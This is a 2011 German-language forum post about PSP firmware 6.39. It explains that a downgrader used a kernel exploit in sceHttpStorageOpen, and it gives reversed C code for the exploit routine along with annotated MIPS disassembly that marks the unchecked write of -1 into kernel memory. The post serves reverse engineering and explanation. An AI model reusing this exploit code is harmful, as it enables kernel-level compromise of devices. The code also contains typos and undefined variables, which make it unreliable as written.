HacKmaN
Ex-Developer
Beiträge: 2.423
Gruppe: User
Registriert seit: Oct 2009
Status:
Offline
Danke erhalten: 3319
|
RE: Firmware 6.39 veröffentlicht!
Es war kein VSH Exploit, sondern ein Kernel Exploit in sceHttpStorageOpen, mit dem man -1 in die Kernel Partitionen vom RAM schreiben konnte...
Reversed vom Downgrader (Basierend auf Davees Downgrader, man erkennt sofort, dass nur das neue Ksploit eingesetzt wurde):
int (* sceHttpStorageOpen) (int a0, int a1, int a2); // 0x0001600C
int (* pspKernelGetModel)(void) = NULL; // 0x00010B60
SceModule *(* pspKernelFindModuleByName)(const char *name) = NULL; // 0x00010B64
int (* pspKernelLoadExecVSHEf1)(const char *path, struct SceKernelLoadExecVSHParam *param) = NULL; // 0x00010B68
int (* pspKernelLoadExecVSHMs1)(const char *path, struct SceKernelLoadExecVSHParam *param) = NULL; // 0x00010B6C
SceUID (* pspIoOpen)(char *file, int flags, SceMode mode) = NULL; // 0x00010B70
int (* pspIoWrite)(SceUID fd, void *data, u32 len) = NULL; //0x00010B74
int (* pspIoClose)(SceUID fd) = NULL; // 0x00010B78
u32 g_kfunctions_resolved = 0; // 0x00010B5C
/* sub_00000E1C */
int pre_kernel(int (* kfunc)(void))
{
pspSdkSetK1(0);
if(!g_kfunctions_resolved)
{
for(i = 0x88000000; i < 0x883FFFA8; i += 4)
{
if( _lw(i + 0x00) == 0x27BDFFE0 && _lw(i + 0x04) == 0xAFB40010 &&
_lw(i + 0x08) == 0xAFB3000C && _lw(i + 0x0C) == 0xAFB20008 &&
_lw(i + 0x10) == 0x00009021 && _lw(i + 0x14) == 0x02409821 &&
_lw(i + 0x54) == 0x0263202A)
{
pspKernelFindModuleByName = (void *)i;
break;
}
}
pspKernelGetModel = (void *)FindProc("sceSystemMemoryManager", "SysMemForKernel", 0x458A70B5);
pspKernelLoadExecVSHEf1 = (void *)FindProc("sceLoadExec", "LoadExecForKernel", 0xCEFE1100);
pspKernelLoadExecVSHMs1 = (void *)FindProc("sceLoadExec", "LoadExecForKernel", 0x7286CF0B);
pspIoOpen = (void *)FindProc("sceIOFileManager", "IoFileMgrForKernel", 0x109F50BC);
pspIoWrite = (void *)FindProc("sceIOFileManager", "IoFileMgrForKernel", 0x42EC03AC);
pspIoClose = (void *)FindProc("sceIOFileManager", "IoFileMgrForKernel", 0x810C4BC3);
g_kfunctions_resolved = 1;
}
ClearCaches();
return kfunc();
}
/* loc_00000B90 */
int execKernelFunction631(void *kfunc)
{
u32 kernel_exec_func = ((u32)pre_kernel) | 0x80000000;
u32 kernel_exec_ptr = ((u32)&kernel_exec_func) - 16;
int res = sceKernelPowerLock((void *)((u32)kfunc | 0x80000000), ((u32)&kernel_exec_ptr) - 0x4230);
ClearCaches();
return res;
}
/* sub_00000924 */
int execKernelFunction635_8(void *kfunc)
{
u32 kernel_exec_func = ((u32)pre_kernel) | 0x80000000;
u32 kernel_exec_ptr = ((u32)&kernel_exec_func) - 16,
int ret = sceKernelPowerLock((void *)((u32)kfunc | 0x80000000), ((u32)&kernel_exec_ptr) - 0x40F0);
ClearCaches();
return ret;
}
/* sub_00000D8C */
int execKernelFunction(void *kfunc)
{
int version = sceKernelDevkitVersion();
if(version == 0x06030110) // 6.31
{
return execKernelFunction631(kfunc);
}
else if(version == 0x60300510 || version == 0x60300810) // 6.35 / 6.38
{
return ececKernelFunction635_8(kfunc);
}
return 0;
}
/* loc_000007E8 */
void repairKernel638(void)
{
*(u32 *)0x8800CC34 = 0;
return 0;
}
void doKernelExploit638(void)
{
sceUtilityLoadNetModule(1);
sceUtilityLoadNetModule(2);
sceUtilityLoadNetModule(3);
sceUtilityLoadNetModule(4);
sceUtilityLoadNetModule(5);
sceUtilityLoadNetModule(6);
SceLibraryStubTable *stub = findLibraryByName("sceHttpStorage", 0x08800000);
sceHttpStorageOpen = getFunctionFromLibrary(addr, 0x700AAD44);
sceHttpStorageOpen(-612, 0, 0);
sceKernelDelayThread(0xF4240);
ClearCaches();
sceHttpStorageOpen(0x2200330D, 0, 0);
ClearCaches();
execKernelFunction635_8(repairKernel638);
sceUtilityLoadNetModule(6);
sceUtilityLoadNetModule(5);
sceUtilityLoadNetModule(4);
sceUtilityLoadNetModule(3);
sceUtilityLoadNetModule(2);
sceUtilityLoadNetModule(1);
}
sceHttpStorageOpen in ASM Form, die Stelle, wo das Ksploit ist, ist markiert:
; ======================================================
; Subroutine sceHttpStorage_driver_700AAD44 - Address 0x00000000 - Aliases: sceHttpStorage_700AAD44
; Exported in sceHttpStorage_driver
; Exported in sceHttpStorage
sceHttpStorage_driver_700AAD44:
0x00000000: 0x27BDFFE0 '...'' - addiu $sp, $sp, -32
0x00000004: 0x3C028000 '...<' - lui $v0, 0x8000
0x00000008: 0x2C830002 '...,' - sltiu $v1, $a0, 2
0x0000000C: 0xAFB3000C '....' - sw $s3, 12($sp)
0x00000010: 0x3C130000 '...<' - lui $s3, 0x0
0x00000014: 0xAFB20008 '....' - sw $s2, 8($sp)
0x00000018: 0x03609021 '!.`.' - move $s2, $k1
0x0000001C: 0x001BDAC0 '....' - sll $k1, $k1, 11
0x00000020: 0xAFB10004 '....' - sw $s1, 4($sp)
0x00000024: 0x00048880 '....' - sll $s1, $a0, 2
0x00000028: 0xAFB00000 '....' - sw $s0, 0($sp)
0x0000002C: 0x34500100 '..P4' - ori $s0, $v0, 0x100
0x00000030: 0xAFBF0014 '....' - sw $ra, 20($sp)
0x00000034: 0x10600009 '..`.' - beqz $v1, loc_0000005C
0x00000038: 0xAFB40010 '....' - sw $s4, 16($sp)
0x0000003C: 0x266A0000 '..j&' - addiu $t2, $s3, 0
0x00000040: 0x022A4821 '!H*.' - addu $t1, $s1, $t2
0x00000044: 0x8D280000 '..(.' - lw $t0, 0($t1)
0x00000048: 0x3C038000 '...<' - lui $v1, 0x8000
0x0000004C: 0x2407FFFF '...$' - li $a3, -1
0x00000050: 0x0220A021 '!. .' - move $s4, $s1
0x00000054: 0x11070014 '....' - beq $t0, $a3, loc_000000A8
0x00000058: 0x34700020 ' .p4' - ori $s0, $v1, 0x20
loc_0000005C: ; Refs: 0x00000034 0x000000D4
0x0000005C: 0x26740000 '..t&' - addiu $s4, $s3, 0
0x00000060: 0x02348821 '!.4.' - addu $s1, $s1, $s4
0x00000064: 0x8E240000 '..$.' - lw $a0, 0($s1)
0x00000068: 0x04820005 '....' - bltzl $a0, loc_00000080
0x0000006C: 0x0240D821 '!.@.' - move $k1, $s2
0x00000070: 0x0C0001B3 '....' - jal IoFileMgrForKernel_810C4BC3
0x00000074: 0x2413FFFF '...$' - li $s3, -1
0x00000078: 0xAE330000 '..3.' - sw $s3, 0($s1) ; hier ist der Exploit
; $s1 ist via $a0 beeinflussbar und wird nicht via $k1 geprüft. Auf diese Weise kann man beliebige
; Werte im Kernelram mit -1 überschreiben.
0x0000007C: 0x0240D821 '!.@.' - move $k1, $s2
loc_00000080: ; Refs: 0x00000068
0x00000080: 0x02001821 '!...' - move $v1, $s0
loc_00000084: ; Refs: 0x000000E8
0x00000084: 0x8FBF0014 '....' - lw $ra, 20($sp)
0x00000088: 0x8FB40010 '....' - lw $s4, 16($sp)
0x0000008C: 0x8FB3000C '....' - lw $s3, 12($sp)
0x00000090: 0x8FB20008 '....' - lw $s2, 8($sp)
0x00000094: 0x8FB10004 '....' - lw $s1, 4($sp)
0x00000098: 0x8FB00000 '....' - lw $s0, 0($sp)
0x0000009C: 0x00601021 '!.`.' - move $v0, $v1
0x000000A0: 0x03E00008 '....' - jr $ra
0x000000A4: 0x27BD0020 ' ..'' - addiu $sp, $sp, 32
loc_000000A8: ; Refs: 0x00000054
0x000000A8: 0x3C0E0200 '...<' - lui $t6, 0x200
0x000000AC: 0x35CD0603 '...5' - ori $t5, $t6, 0x603
0x000000B0: 0x00AD5824 '$X..' - and $t3, $a1, $t5
0x000000B4: 0x3C0C0400 '...<' - lui $t4, 0x400
0x000000B8: 0x016C2825 '%(l.' - or $a1, $t3, $t4
0x000000BC: 0x10800012 '....' - beqz $a0, loc_00000108
0x000000C0: 0x30C601A4 '...0' - andi $a2, $a2, 0x1A4
0x000000C4: 0x240F0001 '...$' - li $t7, 1
0x000000C8: 0x108F0009 '....' - beq $a0, $t7, loc_000000F0
0x000000CC: 0x3C048000 '...<' - lui $a0, 0x8000
0x000000D0: 0x34900100 '...4' - ori $s0, $a0, 0x100
loc_000000D4: ; Refs: 0x00000100
0x000000D4: 0x0600FFE1 '....' - bltz $s0, loc_0000005C
0x000000D8: 0x00001821 '!...' - move $v1, $zr
0x000000DC: 0x26660000 '..f&' - addiu $a2, $s3, 0
0x000000E0: 0x02862821 '!(..' - addu $a1, $s4, $a2
0x000000E4: 0x0240D821 '!.@.' - move $k1, $s2
0x000000E8: 0x08000021 '!...' - j loc_00000084
0x000000EC: 0xACB00000 '....' - sw $s0, 0($a1)
loc_000000F0: ; Refs: 0x000000C8
0x000000F0: 0x3C180000 '...<' - lui $t8, 0x0
0x000000F4: 0x27040990 '...'' - addiu $a0, $t8, 2448
loc_000000F8: ; Refs: 0x0000010C
0x000000F8: 0x0C0001AB '....' - jal IoFileMgrForKernel_109F50BC
0x000000FC: 0x00000000 '....' - nop
0x00000100: 0x08000035 '5...' - j loc_000000D4
0x00000104: 0x00408021 '!.@.' - move $s0, $v0
loc_00000108: ; Refs: 0x000000BC
0x00000108: 0x3C100000 '...<' - lui $s0, 0x0
0x0000010C: 0x0800003E '>...' - j loc_000000F8
0x00000110: 0x260409AC '...&' - addiu $a0, $s0, 2476
//EDIT: Wo "&" steht, sollte normalerweise & stehen... kA warum das hier nicht klappt.
mfg
Dieser Beitrag wurde zuletzt bearbeitet: 24.05.2011 14:36 von HacKmaN.
|
|